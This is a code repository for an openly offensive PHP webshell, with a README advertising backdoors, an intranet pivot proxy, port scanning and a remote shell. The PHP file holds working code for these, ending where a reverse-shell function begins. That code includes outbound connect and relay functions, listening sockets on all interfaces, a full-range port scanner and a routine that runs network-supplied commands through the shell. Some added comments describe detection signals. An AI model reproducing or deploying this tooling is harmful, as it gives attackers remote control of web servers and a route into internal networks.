├── README.md
└── webshell.php
/README.md:
--------------------------------------------------------------------------------
1 | ###### AIOSHELL
2 | A php webshell run under linux based webservers. v0.05
3 |
4 | by wzt 2014,2015 wzt.wzt@gmail.com
5 |
6 | hmmm, i wrote this php program to prove that i am not only a kernel developer.
7 |
8 | ###### FEATURES
9 | 1. system information collection for linux systems.
10 | 2. connect or bind backdoor using the php socket API, not nc or other binaries.
11 | 3. proxy server to connect intranet server from internet server.
12 | 4. port scanner with flexible configuration that can display banner information.
13 | 5. comfortable terminal shell.
14 | 6. file and directory operations.
15 |
16 | ###### TODO
17 | 1. remote ftp/ssh/mysql passwd crack tool.
18 | 2. mysql management.
19 |
20 | ###### SOURCE
21 | https://github.com/cloudsec/aioshell
22 |
--------------------------------------------------------------------------------
/webshell.php:
--------------------------------------------------------------------------------
1 | ';
88 |
89 | $fp=@fopen($file_name, "r");
90 | $data=@fread($fp, filesize($file_name));
91 |
92 | echo '
96 |
97 | ';
98 | }
99 | else {
100 | $fp=@fopen($file_name, "w+");
101 | $result=@fwrite($fp, $_POST['newcontent']);
102 | @fclose($fp);
103 | if ($result == false) {
104 | echo "edit failed.";
105 | }
106 | else {
107 | echo "edit ok.";
108 | }
109 | }
110 |
111 | }
112 |
/**
 * Rename a filesystem entry and report the outcome on stdout.
 *
 * @param string $old_file_name existing path
 * @param string $new_file_name destination path
 * @return int 0 on success, -1 when the source is missing or rename() fails
 */
function rename_file($old_file_name, $new_file_name)
{
	$source_exists = file_exists($old_file_name);
	if (!$source_exists) {
		echo "file $old_file_name not exist.\n";
		return -1;
	}

	$renamed = rename($old_file_name, $new_file_name);
	if (!$renamed) {
		echo "rename $old_file_name to $new_file_name failed.\n";
		return -1;
	}

	echo "rename $old_file_name to $new_file_name ok.\n";
	return 0;
}
128 |
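/**
 * Format a byte count as a whole number plus a binary unit suffix
 * ("0 Bytes", "1 KB", "3 GB").
 *
 * @param int|float $bytes size in bytes
 * @return string truncated (not rounded) value followed by the unit
 */
function get_human_size($bytes)
{
	$units = array("Bytes", "KB", "MB", "GB", "TB");
	$last = count($units) - 1;
	$idx = 0;

	// Stop at the largest unit: the original kept dividing for sizes of
	// 1024 TB and more and then read past the end of the unit table.
	while ($bytes >= 1024 && $idx < $last) {
		$bytes /= 1024;
		$idx++;
	}

	return (intval($bytes)." ".$units[$idx]);
}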
141 |
/**
 * Last four octal digits of a path's mode bits, e.g. "0644" or "0755".
 *
 * @param string $file_name path handed to fileperms()
 * @return string the low twelve permission bits as octal text
 */
function get_file_perms($file_name)
{
	$octal_mode = sprintf('%o', fileperms($file_name));

	return substr($octal_mode, -4);
}
146 |
147 |
/**
 * Render a path's mode bits in ls(1) style, e.g. "-rw-r--r--" or "drwx------".
 *
 * The first character is the file type, followed by the owner, group and
 * other rwx triplets; setuid/setgid are shown as s/S in the execute column
 * and the sticky bit as t/T.
 *
 * @param string $file_name path handed to fileperms()
 * @return string ten-character mode string ('u' as the type when unrecognised)
 */
function get_human_file_perms($file_name)
{
	$mode = fileperms($file_name);

	// File-type masks, most specific first, so that the composite values
	// (socket 0xC000, symlink 0xA000, block 0x6000) win over the single
	// bits they overlap with.
	$type_masks = array(
		0xC000 => 's',
		0xA000 => 'l',
		0x8000 => '-',
		0x6000 => 'b',
		0x4000 => 'd',
		0x2000 => 'c',
		0x1000 => 'p',
	);
	$rendered = 'u';
	foreach ($type_masks as $mask => $type_char) {
		if (($mode & $mask) == $mask) {
			$rendered = $type_char;
			break;
		}
	}

	// One row per owner/group/other: read, write and execute bits, the
	// special bit that shares the execute column, and its two glyphs.
	$triplets = array(
		array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
		array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
		array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
	);
	foreach ($triplets as $bits) {
		list($r, $w, $x, $special, $with_x, $without_x) = $bits;
		$rendered .= ($mode & $r) ? 'r' : '-';
		$rendered .= ($mode & $w) ? 'w' : '-';
		if ($mode & $x) {
			$rendered .= ($mode & $special) ? $with_x : 'x';
		} else {
			$rendered .= ($mode & $special) ? $without_x : '-';
		}
	}

	return $rendered;
}
190 |
/**
 * User name of a path's owner, via fileowner() + posix_getpwuid().
 *
 * @param string $file_name path to stat
 * @return string|null the passwd name; null (after a notice) when the
 *                     uid has no passwd entry
 */
function get_file_owner($file_name)
{
	$passwd_entry = posix_getpwuid(fileowner($file_name));

	return $passwd_entry['name'];
}
198 |
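/**
 * Print every entry of a directory as "dir/entry", one per line, skipping
 * "." and "..". Entries come out in readdir() order, i.e. unsorted.
 *
 * @param string $dir_path directory to list
 * @return int 0 on success, -1 when the path is not a directory or
 *             cannot be opened
 */
function read_dir($dir_path)
{
	// The original fell through to closedir() on a never-assigned handle
	// when given a non-directory; report that case instead.
	if (!is_dir($dir_path)) {
		echo "$dir_path is not a directory.\n";
		return -1;
	}

	$dp = opendir($dir_path);
	if ($dp === false) {
		echo "open $dir_path failed.\n";
		return -1;
	}

	// Strict comparison: an entry literally named "0" is a valid name and
	// must not end the loop the way `!= false` did.
	while (($file_name = readdir($dp)) !== false) {
		if ($file_name === "." || $file_name === "..")
			continue;
		$sub_path = $dir_path."/".$file_name;
		echo "$sub_path\n";
	}

	closedir($dp);
	return 0;
}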
217 |
/**
 * Render a tabular listing of $dir_path (the surrounding markup has been
 * stripped from this copy): one row per entry with name, timestamp, human
 * readable size, octal and symbolic perms, owner, and delete/edit/download/
 * rename actions.
 *
 * NOTE(review): fileatime/filesize/fileperms/fileowner and the helpers are
 * called with the bare $file_name rather than $sub_path, so they resolve
 * against the process cwd; this is only correct when $dir_path is the cwd,
 * which is what aio_directory() passes. The "Last modified" column shows
 * fileatime(), not filemtime(). closedir($dp) runs even when is_dir() was
 * false and $dp was never assigned. The `!= false` loop test stops early on
 * an entry named "0".
 *
 * @param string $dir_path directory to render
 * @return int 0, or -1 when opendir() fails
 */
218 | function read_dirs($dir_path)
219 | {
220 | echo '
221 |
222 |
223 | Filename |
224 | Last modified |
225 | Size |
226 | Chmod/Perms |
227 | Action |
228 |
';
229 |
230 | if (is_dir($dir_path)) {
231 | if (($dp = opendir($dir_path)) == false) {
232 | echo "open $dir_path failed.\n";
233 | return -1;
234 | }
235 | while (($file_name = readdir($dp)) != false) {
236 | if ($file_name == "." || $file_name == "..")
237 | continue;
238 | $sub_path = $dir_path."/".$file_name;
// Per-entry metadata; see the NOTE above about $file_name vs $sub_path.
239 | $last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
240 | $file_size=filesize($file_name);
241 | $file_size_string=get_human_size($file_size);
242 | $file_perms=get_file_perms($file_name);
243 | $file_perms_string=get_human_file_perms($file_name);
244 | $file_owner=get_file_owner($file_name);
245 |
246 | echo '
247 | '.$file_name.' |
248 | '.$last_modify_time.' |
249 | '.$file_size_string.' |
250 | '.$file_perms.' / '.$file_perms_string.' / '.$file_owner.' |
251 | Delete
252 | Edit
253 | Download
254 | Rename
255 | |
256 |
';
257 |
258 | }
259 | }
260 |
261 | echo '
';
262 |
263 | closedir($dp);
264 | return 0;
265 | }
266 |
/**
 * Render the process's current working directory through read_dirs().
 *
 * @return int whatever read_dirs() returns (0, or -1 on an opendir failure)
 */
function aio_directory()
{
	return read_dirs(getcwd());
}
273 |
274 |
/**
 * Recursively look for an entry whose name equals $target_file (exact
 * strcmp match) under $dir_path, printing "found"/"not found" per
 * directory visited.
 *
 * NOTE(review): the recursive call's result is discarded, so the return
 * value only reflects the top-level directory, and "not found" is printed
 * once for every subdirectory that lacks the name. The `!= false` loop
 * test stops early on an entry named "0".
 *
 * @param string $dir_path directory to walk
 * @param string $target_file exact entry name to find
 * @return int 0 when the name was found directly in $dir_path, else -1
 */
275 | function search_file_by_name($dir_path, $target_file)
276 | {
277 | if (is_dir($dir_path)) {
278 | if (($dp = opendir($dir_path)) == false) {
279 | echo "open $dir_path failed.\n";
280 | return -1;
281 | }
282 | while (($file_name = readdir($dp)) != false) {
283 | if ($file_name == "." || $file_name == "..")
284 | continue;
285 |
286 | $sub_path = $dir_path."/".$file_name;
// Depth-first descent; its outcome is not propagated to this level.
287 | if (is_dir($sub_path)) {
288 | search_file_by_name($sub_path, $target_file);
289 | }
290 |
291 | if (!strcmp($file_name, $target_file)) {
292 | echo "found $target_file.\n";
293 | closedir($dp);
294 | return 0;
295 | }
296 | }
297 |
298 | echo "not found $target_file.\n";
299 | closedir($dp);
300 | }
301 |
302 | return -1;
303 | }
304 |
305 | /**
306 | * Recursively print the entries under $dir_path that carry a certain
 * attribute for the current process.
307 | *
308 | * @dir_path - directory to walk.
309 | * @attr_flag - 0 readable.
310 | * - 1 writeable.
311 | * - 2 executable.
 *
 * Returns 0 (also for a non-directory path), -1 when opendir() fails.
 *
 * NOTE(review): is_readable/is_writable/is_executable receive the bare
 * $file_name, not $sub_path, so the check is made relative to the process
 * cwd while the printed path is the full one; below the top level the two
 * refer to different files. The `!= false` loop test stops early on an
 * entry named "0".
312 | */
313 | function show_attr_file($dir_path, $attr_flag)
314 | {
315 | if (is_dir($dir_path)) {
316 | if (($dp = opendir($dir_path)) == false) {
317 | echo "open $dir_path failed.\n";
318 | return -1;
319 | }
320 | while (($file_name = readdir($dp)) != false) {
321 | if ($file_name == "." || $file_name == "..")
322 | continue;
323 |
324 | $sub_path = $dir_path."/".$file_name;
325 | if (is_dir($sub_path)) {
326 | show_attr_file($sub_path, $attr_flag);
327 | }
328 |
// Attribute test (see NOTE above about which path is actually tested).
329 | if ($attr_flag == 0) {
330 | if (is_readable($file_name))
331 | echo "$sub_path\n";
332 | }
333 | else if ($attr_flag == 1) {
334 | if (is_writable($file_name))
335 | echo "$sub_path\n";
336 | }
337 | else if ($attr_flag == 2) {
338 | if (is_executable($file_name))
339 | echo "$sub_path\n";
340 | }
341 | else {
342 | echo "wrong attribute flag.\n";
343 | break;
344 | }
345 | }
346 | closedir($dp);
347 | }
348 |
349 | return 0;
350 | }
351 |
/**
 * Create a directory with mode 0700 (further restricted by the umask) and
 * report the outcome on stdout.
 *
 * @param string $dir_path path to create
 * @return int 0 on success; -1 silently when the path already exists, or
 *             with a message when mkdir() fails
 */
function create_dir($dir_path)
{
	$already_present = file_exists($dir_path);
	if ($already_present)
		return -1;

	$created = mkdir($dir_path, 0700);
	if (!$created) {
		echo "create $dir_path failed.\n";
		return -1;
	}

	echo "create $dir_path ok.\n";
	return 0;
}
364 |
/**
 * Remove a single (empty) directory and report the outcome on stdout.
 *
 * @param string $dir_path path to remove
 * @return int 0 on success; -1 silently when the path does not exist, or
 *             with a message when rmdir() fails
 */
function destroy_dir($dir_path)
{
	if (!file_exists($dir_path))
		return -1;

	$removed = rmdir($dir_path);
	if (!$removed) {
		echo "delete $dir_path failed.\n";
		return -1;
	}

	echo "delete $dir_path ok.\n";
	return 0;
}
378 |
/**
 * Recursively delete a directory tree: files through delete_file() (defined
 * above the part of the file shown here), subdirectories by recursion, then
 * the directory itself via destroy_dir().
 *
 * There is no confirmation step and no dry run; a non-directory path is
 * ignored and still yields 0. The `!= false` loop test stops early on an
 * entry named "0", which would leave the tree partially deleted.
 *
 * @param string $dir_path root of the tree to remove
 * @return int 0, or -1 when opendir() fails
 */
379 | function destroy_dirs($dir_path)
380 | {
381 | if (is_dir($dir_path)) {
382 | if (($dp = opendir($dir_path)) == false) {
383 | echo "open $dir_path failed.\n";
384 | return -1;
385 | }
386 | while (($file_name = readdir($dp)) != false) {
387 | if ($file_name == "." || $file_name == "..")
388 | continue;
389 | $sub_path = $dir_path."/".$file_name;
390 |
391 | if (is_dir($sub_path)) {
392 | destroy_dirs($sub_path);
393 | }
394 | else
395 | delete_file($sub_path);
396 | }
397 |
// Children are gone (or were skipped); now remove the directory itself.
398 | closedir($dp);
399 | destroy_dir($dir_path);
400 | return 0;
401 | }
402 |
403 | return 0;
404 | }
405 |
/**
 * Print an id(1)-like line for the process owner: uid, gid, home and shell.
 *
 * The parentheses after gid= repeat the user name; no group lookup is made.
 */
function linux_id()
{
	$uid = posix_getuid();
	$pw = posix_getpwuid($uid);
	$name = $pw['name'];

	$line = "uid=".$uid."(".$name.") ";
	$line .= "gid=".$pw['gid']."(".$name.") ";
	$line .= "dir=".$pw['dir']." ";
	$line .= "shell=".$pw['shell']."\n";

	echo $line;
}
416 |
/**
 * Print the five posix_uname() fields (sysname, nodename, release, version,
 * machine) separated by single spaces, with no trailing newline.
 */
function linux_uname()
{
	$u = posix_uname();
	$fields = array(
		$u['sysname'],
		$u['nodename'],
		$u['release'],
		$u['version'],
		$u['machine'],
	);

	echo implode(" ", $fields);
}
424 |
/**
 * Extract the value of the "Name:" line from a /proc/<pid>/status-style file.
 *
 * @param string $file_name file to scan line by line
 * @return string|int second whitespace-separated token of the first line
 *                    containing "Name:"; 0 when no such line exists; -1
 *                    when the file cannot be opened
 */
function get_proc_name($file_name)
{
	$fp = fopen($file_name, "r");
	if (!$fp) {
		echo "open $file_name failed.\n";
		return -1;
	}

	$name = 0;
	// Loose `!= false` kept from the original: a final line consisting of
	// just "0" would also end the scan.
	while (($line = fgets($fp, 1024)) != false) {
		if (strstr($line, "Name:") === false) {
			continue;
		}
		sscanf($line, "%s %s", $label, $name);
		break;
	}

	fclose($fp);
	return $name;
}
444 |
/**
 * Return the first line (at most 1023 bytes) of a file, or -1 with a
 * message when it cannot be opened.
 *
 * Used on /proc/<pid>/cmdline, whose arguments are NUL-separated; the
 * NULs are returned as-is.
 *
 * @param string $file_name file to read
 * @return string|int|false the line, false when the file is empty, -1 on
 *                          open failure
 */
function get_proc_cmd($file_name)
{
	$fp = fopen($file_name, "r");
	if (!$fp) {
		echo "open $file_name failed.\n";
		return -1;
	}

	$first_line = fgets($fp, 1024);
	fclose($fp);

	return $first_line;
}
458 |
/**
 * Minimal ps: walk /proc, and for every all-digit entry print
 * "<pid>\t\t<Name from status> <first line of cmdline>".
 *
 * get_proc_name()/get_proc_cmd() may return -1 or 0 on failure; those are
 * printed as-is. The `!= false` loop test is the same loose comparison
 * used elsewhere in this file.
 *
 * @return int 0, or -1 when /proc cannot be opened
 */
459 | function linux_ps()
460 | {
461 | if (($dp = opendir("/proc")) == false) {
462 | echo "open /proc failed.\n";
463 | return -1;
464 | }
465 | echo "open /proc ok.\n";
466 |
467 | while (($file_name = readdir($dp)) != false) {
468 | if ($file_name == "." || $file_name == "..")
469 | continue;
470 |
// Only numeric entries are processes; skip self, sys, net, ...
471 | if (ctype_digit($file_name) == false)
472 | continue;
473 |
474 | $dir_path = "/proc/$file_name/status";
475 | $proc_name = get_proc_name($dir_path);
476 |
477 | $dir_path = "/proc/$file_name/cmdline";
478 | $proc_cmd = get_proc_cmd($dir_path);
479 |
480 | echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
481 | }
482 |
483 | closedir($dp);
484 | return 0;
485 | }
486 |
/**
 * Open a blocking TCP connection to $host:$port.
 *
 * Connect failures are silenced with @ and not reported; only socket
 * creation failure prints a message.
 *
 * @param string $host address or name accepted by socket_connect()
 * @param int|string $port
 * @return resource|object|int the connected socket, or -1 on any failure
 *
 * Defender note: this is the primitive behind connect_backdoor() and
 * run_proxy_client() below, i.e. outbound TCP initiated by the web server
 * process itself; egress alerts on connections from the web tier are the
 * corresponding detection.
 */
487 | function tcp_connect($host, $port)
488 | {
489 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
490 | if ($socket == false) {
491 | echo "create socket error.\n";
492 | return -1;
493 | }
494 |
495 | if (@socket_connect($socket, $host, $port) == false) {
496 | socket_close($socket);
497 | return -1;
498 | }
499 |
500 | return $socket;
501 | }
502 |
/**
 * Non-blocking TCP connect with a caller-supplied deadline in seconds,
 * polled at one-second granularity via sleep(1).
 *
 * The errno values 115 and 114 are Linux EINPROGRESS and EALREADY, i.e.
 * "still connecting"; any other error aborts immediately. Nothing in the
 * visible listing calls this function (the callers above and below use
 * tcp_connect()).
 *
 * @param string $host
 * @param int|string $port
 * @param int $timeout seconds to keep retrying
 * @return resource|object|int the connected socket (still non-blocking),
 *                             or -1 on failure or timeout
 */
503 | function tcp_connect_timeout($host, $port, $timeout)
504 | {
505 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
506 | if ($socket == false) {
507 | echo "create socket error.\n";
508 | return -1;
509 | }
510 |
511 | if (socket_set_nonblock($socket) == false) {
512 | echo "set nonblock error.\n";
513 | socket_close($socket);
514 | return -1;
515 | }
516 |
517 | $time = time();
518 | while (!@socket_connect($socket, $host, $port)) {
519 | $err = socket_last_error($socket);
// 115 = EINPROGRESS, 114 = EALREADY on Linux: keep waiting.
520 | if ($err == 115 || $err == 114) {
521 | if ((time() - $time) >= $timeout) {
522 | socket_close($socket);
523 | echo "socket timeout.\n";
524 | return -1;
525 | }
526 | sleep(1);
527 | continue;
528 | }
529 | socket_close($socket);
530 | return -1;
531 | }
532 |
533 | echo "connect to $host:$port ok.\n";
534 | return $socket;
535 | }
536 |
/**
 * Connect outward to two endpoints and relay bytes between them with
 * run_proxy_core(); used by web_proxy_client() with the "intranet" and
 * "public" form values.
 *
 * @return int 0 after the relay ends, -1 when either connect fails
 *
 * Defender note: the characteristic artefact is a single web server worker
 * holding two simultaneous outbound connections, one to an internal host
 * and one to an external one, for as long as the relay runs.
 */
537 | function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
538 | {
539 | $socket1 = tcp_connect($remote_host1, $remote_port1);
540 | if ($socket1 == -1) {
541 | echo "connect to $remote_host1:$remote_port1 failed.\n";
542 | return -1;
543 | }
544 | echo "connect to $remote_host1:$remote_port1 ok.\n";
545 |
546 | $socket2 = tcp_connect($remote_host2, $remote_port2);
547 | if ($socket2 == -1) {
548 | echo "connect to $remote_host2:$remote_port2 failed.\n";
549 | socket_close($socket1);
550 | return -1;
551 | }
552 | echo "connect to $remote_host2:$remote_port2 ok.\n";
553 |
// run_proxy_core() closes both sockets before returning.
554 | run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
555 |
556 | return 0;
557 | }
558 |
/**
 * Form handler for the "proxy" page: prints the form (markup stripped in
 * this copy) and, when all four POST fields are present, starts
 * run_proxy_client() with them unvalidated.
 *
 * empty() treats "0" as missing, so a port of "0" is rejected here.
 *
 * @return int|null -1 when a field is missing; otherwise the implicit null
 *                  after the relay finishes
 */
559 | function web_proxy_client()
560 | {
561 | echo '
585 |
586 | Linux reverse proxy
587 |
598 |
599 | ';
600 |
601 | if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
602 | empty($_POST['public_host']) || empty($_POST['public_port']))
603 | return -1;
604 |
605 | run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
606 | $_POST['public_host'], $_POST['public_port']);
607 | }
608 |
/**
 * Bidirectional relay: poll both sockets with socket_select() and copy
 * whatever one side sends (1024-byte chunks) to the other until a read or
 * write fails. Both sockets are closed before returning.
 *
 * NOTE(review): socket_select() is called with a zero timeout and no sleep,
 * so the loop spins the CPU while idle; in practice a relay session looks
 * like a PHP worker pegged at 100% CPU. The fourth argument passed is
 * `$except`, which is never assigned, while `$except_sockets` (set to NULL
 * just above) is unused. Because `0 == false`, a peer closing its side hits
 * the "socket_recv" branch rather than the "recv no data" one; the loop ends
 * either way.
 *
 * @param resource|object $socket1
 * @param string $remote_host1 label for $socket1 in messages
 * @param resource|object $socket2
 * @param string $remote_host2 label for $socket2 in messages
 * @return int always 0
 */
609 | function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
610 | {
611 | while (true) {
612 | $read_sockets = array($socket1, $socket2);
613 | $write_sockets = NULL;
614 | $except_sockets = NULL;
615 |
// Zero timeout: returns immediately whether or not anything is readable.
616 | if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
617 | echo "socket_select error ".socket_strerror(socket_last_error())."\n";
618 | break;
619 | }
620 |
621 | if (in_array($socket2, $read_sockets)) {
622 | //echo "got data from $remote_host2.\n";
623 |
624 | $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
625 | if ($bytes2 == false) {
626 | echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
627 | break;
628 | }
629 | //echo "got bytes $bytes2.\n";
630 |
631 | if ($bytes2 == 0) {
632 | echo "recv no data from $remote_host2.\n";
633 | break;
634 | }
635 |
636 | $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
637 | if ($ret2 == false) {
638 | echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
639 | break;
640 | }
641 | if ($ret2 != $bytes2) {
642 | echo "send data failed.\n";
643 | break;
644 | }
645 | //echo "write $ret2 bytes ok.\n";
646 | }
// Mirror image of the branch above, socket1 -> socket2.
647 | if (in_array($socket1, $read_sockets)) {
648 | //echo "got data from $remote_host1.\n";
649 |
650 | $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
651 | if ($bytes1 == false) {
652 | echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
653 | break;
654 | }
655 | //echo "got bytes $bytes1.\n";
656 |
657 | if ($bytes1 == 0) {
658 | echo "recv no data from $remote_host1.\n";
659 | break;
660 | }
661 |
662 | $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
663 | if ($ret1 == false) {
664 | echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
665 | break;
666 | }
667 | if ($ret1 != $bytes1) {
668 | echo "send data failed.\n";
669 | break;
670 | }
671 | //echo "write $ret1 bytes ok.\n";
672 | }
673 | }
674 |
675 | echo "proxy done.\n";
676 | socket_close($socket1);
677 | socket_close($socket2);
678 |
679 | return 0;
680 | }
681 |
/**
 * Create a listening TCP socket on $local_port.
 *
 * The bind address is the string '0'; presumably this resolves to the
 * wildcard address 0.0.0.0 (all interfaces) - confirm against the PHP
 * sockets extension in use. socket_listen() is called with the default
 * backlog.
 *
 * @param int|string $local_port
 * @return resource|object|int listening socket, or -1 on failure
 *
 * Defender note: together with bindshell() this is the second place in the
 * file where the web server process opens a new listening port; a host
 * inventory of listening sockets per process catches both.
 */
682 | function init_proxy_server($local_port)
683 | {
684 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
685 | if ($socket == false) {
686 | echo "create socket error.\n";
687 | return -1;
688 | }
689 |
690 | if (socket_bind($socket, '0', $local_port) == false) {
691 | echo "bind sock error.\n";
692 | socket_close($socket);
693 | return -1;
694 | }
695 |
696 | if (socket_listen($socket) == false) {
697 | echo "listen sock error.\n";
698 | socket_close($socket);
699 | return -1;
700 | }
701 | echo "listen on port $local_port ok.\n";
702 |
703 | return $socket;
704 | }
705 |
706 |
/**
 * Listen on two local ports, accept exactly one client on each (first port
 * first), then relay between the two accepted connections with
 * run_proxy_core(). Nothing in the visible listing calls this function;
 * the "proxy" page dispatches to web_proxy_client() instead.
 *
 * NOTE(review): when the second init_proxy_server() fails, $socket1 and
 * $newsock1 are left open. The accepted sockets are closed by
 * run_proxy_core(); the two listening sockets are closed here.
 *
 * @param int|string $local_port1
 * @param int|string $local_port2
 * @return int 0 after the relay ends, -1 on a listen failure
 */
707 | function run_proxy_server($local_port1, $local_port2)
708 | {
709 | $socket1 = init_proxy_server($local_port1);
710 | if ($socket1 == -1)
711 | return -1;
712 |
// Blocks until the first client arrives on port 1.
713 | while (true) {
714 | if (($newsock1 = socket_accept($socket1)) !== false) {
715 | socket_getpeername($newsock1, $ip1);
716 | echo "got a client form $ip1\n";
717 | break;
718 | }
719 | }
720 | $socket2 = init_proxy_server($local_port2);
721 | if ($socket2 == -1)
722 | return -1;
723 |
724 | while (true) {
725 | if (($newsock2 = socket_accept($socket2)) !== false) {
726 | socket_getpeername($newsock2, $ip2);
727 | echo "got a client form $ip2\n";
728 | break;
729 | }
730 | }
731 |
732 | echo "start transmit data ...\n";
733 | run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
734 |
735 | socket_close($socket2);
736 | socket_close($socket1);
737 |
738 | return 0;
739 | }
740 |
/**
 * Thin fsockopen() wrapper used by the port scanners below.
 *
 * Errors are suppressed with @ and $errno/$errstr are discarded, so the
 * caller only learns open (stream) versus not open (false).
 *
 * @param string $host
 * @param int|string $port
 * @param int|float $timeout connect timeout in seconds
 * @return resource|false
 */
741 | function tcp_connect_port($host, $port, $timeout)
742 | {
743 | $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
744 |
745 | return $fp;
746 | }
747 |
/**
 * Sequential TCP connect scan of a fixed list of well-known ports on $host,
 * printing one table row (markup stripped in this copy) per open port.
 * With $banner set, the first line the service sends (up to 127 bytes,
 * fgets with a 128-byte limit) is shown as well.
 *
 * Each probe waits up to $timeout seconds, so the whole scan is bounded by
 * count($general_ports) * $timeout.
 *
 * @param string $host target
 * @param int|float $timeout per-port connect timeout in seconds
 * @param mixed $banner truthy to read and display a banner line
 * @return void
 *
 * Defender note: from the network this is a burst of connect() attempts
 * from the web server's address to many ports of one host, the classic
 * signature a NIDS or flow-based scan detector fires on.
 */
748 | function port_scan_fast($host, $timeout, $banner)
749 | {
750 | $general_ports = array(
751 | '21'=>'FTP',
752 | '22'=>'SSH',
753 | '23'=>'Telnet',
754 | '25'=>'SMTP',
755 | '79'=>'Finger',
756 | '80'=>'HTTP',
757 | '81'=>'HTTP/Proxy',
758 | '110'=>'POP3',
759 | '135'=>'MS Netbios',
760 | '139'=>'MS Netbios',
761 | '143'=>'IMAP',
762 | '162'=>'SNMP',
763 | '389'=>'LDAP',
764 | '443'=>'HTTPS',
765 | '445'=>'MS SMB',
766 | '873'=>'rsync',
767 | '1080'=>'Proxy/HTTP Server',
768 | '1433'=>'MS SQL Server',
769 | '2433'=>'MS SQL Server Hidden',
770 | '1521'=>'Oracle DB Server',
771 | '1522'=>'Oracle DB Server',
772 | '3128'=>'Squid Cache Server',
773 | '3129'=>'Squid Cache Server',
774 | '3306'=>'MySQL Server',
775 | '3307'=>'MySQL Server',
776 | '3500'=>'Squid Cache Server',
777 | '3389'=>'MS Terminal Service',
778 | '5800'=>'VNC Server',
779 | '5900'=>'VNC Server',
780 | '8080'=>'Proxy/HTTP Server',
781 | '10000'=>'Webmin',
782 | '11211'=>'Memcached'
783 | );
784 |
785 | echo '';
786 |
787 | foreach($general_ports as $port=>$name) {
788 | if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
789 | if (empty($banner) == false) {
// Banner grab: blocks until the service sends a line or the stream's
// default read timeout expires.
790 | $data = fgets($fp, 128);
791 | echo '
792 | '.$host.' |
793 | '.$port.' |
794 | '.$name.' |
795 | '.$data.' |
796 |
';
797 | }
798 | else {
799 | echo '
800 | '.$host.' |
801 | '.$port.' |
802 | '.$name.' |
803 |
';
804 | }
805 | fclose($fp);
806 | }
807 | }
808 | echo '
';
809 | }
810 |
/**
 * Sequential TCP connect scan of the inclusive port range
 * [$src_port, $dst_port] on $host, printing one row (markup stripped in
 * this copy) per open port; with $banner set the first service line
 * (up to 127 bytes) replaces the "OPEN" column.
 *
 * The range bounds are used as given with no numeric validation; the
 * caller run_portscan() passes "1" and "65535", so a full run can take up
 * to 65535 * $timeout seconds.
 *
 * @param string $host target
 * @param int|string $src_port first port
 * @param int|string $dst_port last port
 * @param int|float $timeout per-port connect timeout in seconds
 * @param mixed $banner truthy to read and display a banner line
 * @return void
 */
811 | function port_scan($host, $src_port, $dst_port, $timeout, $banner)
812 | {
813 | echo '
814 |
815 | Host |
816 | Port |
817 | State |
818 |
';
819 |
820 | for ($port = $src_port; $port <= $dst_port; $port++) {
821 | if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
822 | if (empty($banner) == false) {
823 | $data = fgets($fp, 128);
824 | echo '
825 | '.$host.' |
826 | '.$port.' |
827 | '.$data.' |
828 |
';
829 | }
830 | else {
831 | echo '
832 | '.$host.' |
833 | '.$port.' |
834 | OPEN |
835 |
';
836 | }
837 | fclose($fp);
838 | }
839 | }
840 | echo '
';
841 | }
842 |
843 |
/**
 * Form handler for the "portscan" page: prints the form (markup stripped
 * in this copy) and dispatches to port_scan_fast() when the scan_fast
 * field is present, otherwise to a full 1-65535 port_scan().
 *
 * scan_timeout and scan_banner are read from $_POST without isset(), so a
 * request lacking them produces undefined-index notices and empty values.
 *
 * @return int|null -1 when scan_host is empty; otherwise the implicit null
 */
844 | function run_portscan()
845 | {
846 | echo '
847 |
848 |
858 |
859 |
860 |
871 |
872 | ';
873 |
874 | if (empty($_POST['scan_host']))
875 | return -1;
876 |
877 | if (isset($_POST['scan_fast'])) {
878 | port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
879 | $_POST['scan_banner']);
880 | }
881 | else {
882 | port_scan($_POST['scan_host'], "1", "65535",
883 | $_POST['scan_timeout'],
884 | $_POST['scan_banner']);
885 | }
886 | }
887 |
/**
 * Run $cmd through popen() - i.e. via the system shell - and stream its
 * stdout to $socket line by line with socket_write().
 *
 * @param resource|object $socket connected socket
 * @param string $cmd command line exactly as received by the caller
 * @return int 0 once the pipe is drained, -1 on the first failed write
 *
 * NOTE(review): popen() failure is not checked (fgets would then be given
 * false), and the early return on write failure skips pclose(), leaving the
 * child unreaped.
 *
 * Defender note: both callers (connect_backdoor, bindshell) pass bytes read
 * straight off the network, so on the host this appears as the web server
 * worker spawning "sh -c" with a remotely chosen command line - the
 * process-tree anomaly (httpd/php-fpm -> sh) is the most reliable signal.
 */
888 | function linux_exec($socket, $cmd)
889 | {
890 | $handle = popen($cmd, "r");
891 |
892 | while (($buf = fgets($handle, 1024)) != false) {
893 | $ret = socket_write($socket, $buf, strlen($buf));
894 | if ($ret == false) {
895 | return -1;
896 | }
897 | }
898 |
899 | pclose($handle);
900 | return 0;
901 | }
902 |
/**
 * Reverse shell: connect out to $host:$port, send a fixed banner, then
